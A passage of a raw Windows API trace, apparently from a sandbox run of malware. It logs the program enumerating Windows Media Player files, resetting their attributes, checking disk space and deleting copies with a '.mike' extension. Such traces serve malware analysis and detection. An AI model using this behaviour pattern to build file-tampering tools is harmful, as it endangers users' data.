SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0128.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0128.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.957] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png", dwFileAttributes=0x80) returned 0 [0128.958] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x46 [0128.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0128.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0128.958] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png.mike" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.png.mike")) returned 1 [0128.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0128.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0128.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0128.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0128.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0128.961] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0128.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0128.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0128.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0128.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0128.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0128.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0128.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0128.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0128.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.969] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg", dwFileAttributes=0x80) returned 0 [0128.970] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg", lpFilePart=0x0) returned 0x45 [0128.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0128.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0128.971] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.jpg.mike")) returned 1 [0128.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0128.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0128.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0128.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0128.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0128.974] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0128.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0128.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0128.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0128.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0128.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0128.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0128.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0128.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0128.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.982] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png", dwFileAttributes=0x80) returned 0 [0128.983] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png", lpFilePart=0x0) returned 0x45 [0128.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0128.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0128.984] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png.mike" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.png.mike")) returned 1 [0128.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0128.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0128.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0128.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0128.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0128.987] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0128.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0128.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0128.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0128.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0128.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0128.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0129.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0129.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0129.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0129.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0129.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0129.002] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml", dwFileAttributes=0x80) returned 0 [0129.003] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml", lpFilePart=0x0) returned 0x4f [0129.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0129.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0129.004] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\renderingcontrol.xml.mike")) returned 1 [0129.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0129.005] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x162d41c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x162fa320, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.006] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e33732, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e33732, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x55587e5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4d82, dwReserved0=0x0, dwReserved1=0x0, cFileName="avtransport.xml", cAlternateFileName="")) returned 1 [0129.006] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e33732, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e33732, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x555d411c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x14ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="connectionmanager_dmr.xml", cAlternateFileName="")) returned 1 [0129.006] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e0d5d3, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e0d5d3, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x550eb3bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_120.jpg", cAlternateFileName="")) returned 1 [0129.006] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79de7474, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79de7474, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5511151c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3a1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_120.png", cAlternateFileName="")) returned 1 [0129.006] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79d9b1b6, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79d9b1b6, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5511151c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_48.jpg", cAlternateFileName="")) returned 1 [0129.006] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5511151c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0x5511151c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0x5511151c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x10a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_48.png", cAlternateFileName="")) returned 1 [0129.006] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e59891, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e59891, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x555fa27c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x18db, dwReserved0=0x0, dwReserved1=0x0, cFileName="RenderingControl.xml", cAlternateFileName="")) returned 1 [0129.006] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e59891, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e59891, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x555fa27c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x18db, dwReserved0=0x0, dwReserved1=0x0, cFileName="RenderingControl.xml", cAlternateFileName="")) returned 0 [0129.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0129.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0129.007] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0129.007] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0129.007] CoTaskMemFree (pv=0x508980) [0129.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0129.007] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.008] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0129.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0129.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0129.008] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.008] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0129.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0129.009] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0129.009] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0129.009] CoTaskMemFree (pv=0x508980) [0129.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0129.009] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9b6c2483, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9b6c2483, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e98f1d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e98f1d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3ebf07d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 1 [0129.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0129.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0129.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0129.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0129.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9b6c2483, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9b6c2483, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e98f1d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e98f1d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3ebf07d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 1 [0129.011] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e98f1d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e98f1d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3ebf07d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 0 [0129.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0129.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0129.011] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0129.011] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0129.011] CoTaskMemFree (pv=0x508980) [0129.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0129.012] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.012] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0129.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0129.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0129.012] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, 